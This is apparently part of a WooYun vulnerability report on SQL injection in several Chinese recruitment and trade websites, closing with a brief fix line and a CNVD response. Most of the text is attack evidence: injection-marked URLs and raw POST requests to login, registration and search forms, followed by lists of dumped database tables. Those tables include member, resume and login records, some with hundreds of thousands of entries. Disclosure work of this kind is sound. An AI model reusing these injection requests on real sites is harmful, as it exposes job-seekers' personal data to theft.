| dbo.OA_Contract | 13067 |
| dbo.sys_LBSinfo | 12014 |
| dbo._dta_mv_119 | 11152 |
| dbo._dta_mv_59 | 11152 |
http://**.**.**.**/zdyj/zdnew.asp?ai_length=42&ai_rows=9&n=0.3907799569424242&newtype=*
Database: xarc_web
+---------------------------+---------+
| Table | Entries |
+---------------------------+---------+
| dbo.RC_MYBAG | 824671 |
| dbo.RC_RCINFO | 457456 |
| dbo.member_loginlog | 390276 |
| dbo.MEMBER_DOWNLOADRESUME | 350849 |
| dbo.ZP_DWRCBAG | 337252 |
| dbo.RC_APPLYJOB | 279200 |
| dbo.ZP_DWRECEIVEDLETTER | 231249 |
| dbo.ZP_MEMBERZP | 161298 |
| dbo.ZP_DWINFO | 67416 |
| dbo.RC_RECEIVEDINFO | 61609 |
| dbo.ZP_DWINFO_ls | 56401 |
| dbo.MEMBER_EXP | 28255 |
| dbo.CRM_FEE_OVER | 27612 |
| dbo.V_DFJH_CB21 | 24953 |
| dbo.rc_letter | 18203 |
| dbo.RC_JOBBOOKING | 13209 |
http://**.**.**.**/company/prodetail.php?id=29325&company_id=63328
Database: sq_chinamrong
+-----------------------+---------+
| Table | Entries |
+-----------------------+---------+
| cdb_members | 912179 |
| member | 911576 |
| trade_leads | 327541 |
| company | 213190 |
| cdb_uc_memberfields | 154887 |
| cdb_uc_members | 154884 |
| member_log | 108934 |
| cdb_memberfields | 106433 |
| cdb_memberspaces | 56251 |
| cdb_spacecaches | 37604 |
| trade_contact | 36038 |
| product_msg | 26703 |
| cdb_posts | 24868 |
| news | 22476 |
**.**.**.**/headhunter/?actionName=&keyWord=12*&mark=0
**.**.**.**/jobshow.php?id=1&x=21233
**.**.**.**/rencai/?City=&key=&Province=1*&sj=
**.**.**.**/zhaopin/?City=20*
**.**.**.**/zhaopin/?PB_page=4&Province=2*
Database: rencai001
+----------------+---------+
| Table | Entries |
+----------------+---------+
| kan_jl | 177284 |
| jl | 81439 |
| mianshi | 44395 |
| huiyuan_geren | 16548 |
| info_qiye | 6526 |
| shoucang | 3813 |

POST /user/regup.php HTTP/1.1
Host: **.**.**.**
Referer: http://**.**.**.**/
Content-Length: 288
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=kgqm6autfb1rb1oti19ks8gh36; lzrc_username=jxieqhjw; lzrc_job_userclass=1
Connection: Keep-alive Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
email=sample%40email.tst&go=1&password=g00dPa%24%24w0rD&password2=g00dPa%24%24w0rD&Submit=%cf%d6%d4%da%be%cd%b4%b4%bd%a8%ce%d2%b5%c4%d5%ca%bb
%a7&username=*


Database: sjzpw
+---------------------+---------+
| Table | Entries |
+---------------------+---------+
| job_com_or_rc | 122619 |
| cdb_memberfields | 97707 |
| cdb_members | 97549 |
| job_myrc | 95754 |
| job_ku | 87293 |
| job_rczl | 63716 |
| job_zp | 58781 |
| job_gzjl | 15904 |
| job_message | 15795 |
| job_company | 10459 |

POST /zwsearchlist.asp HTTP/1.1
Host: **.**.**.**
Content-Length: 118
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/
Cookie: ASPSESSIONIDCSSBQCBC=FMGGNLCADNHILAHEFGMEFJGE
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63
Safari/537.36
Accept: */*


imageField2=&p_class=com&p_hkadd=1&p_keys=1*&p_time=183&p_zlone=0000
Database: personadata0746job
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| dbo.psend_gruser | 202735 |
| dbo.person_onewedf | 53005 |
| dbo.csend_duedlj | 43586 |
| dbo.psave_dlkjfei | 30373 |
| dbo.csave_dsmyr | 30235 |
| dbo.czpzw_dwefew | 14845 |

POST /Jobs/login/loginCommit.asp HTTP/1.1
Host: **.**.**.**
Content-Length: 145
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/
Cookie: ASPSESSIONIDQCTASCAD=OBBNKNNAGNEIFFFLGGCCJHDL; njrcpassword%5Frc=; njrcusername%5Frc=
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
button=%e7%99%bb%e5%bd%95&destpage=/jobs/MyFaceLetter/Letters.asp&fjm=1&password=111*&username=xlgeustu


修复方案:

过滤吧

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-09-25 17:02

厂商回复:

CNVD确认所述情况,部分案例已经转由CNCERT下发给广东分中心,由其后续协调网站管理单位处置。

最新状态:

暂无


漏洞评价:

评论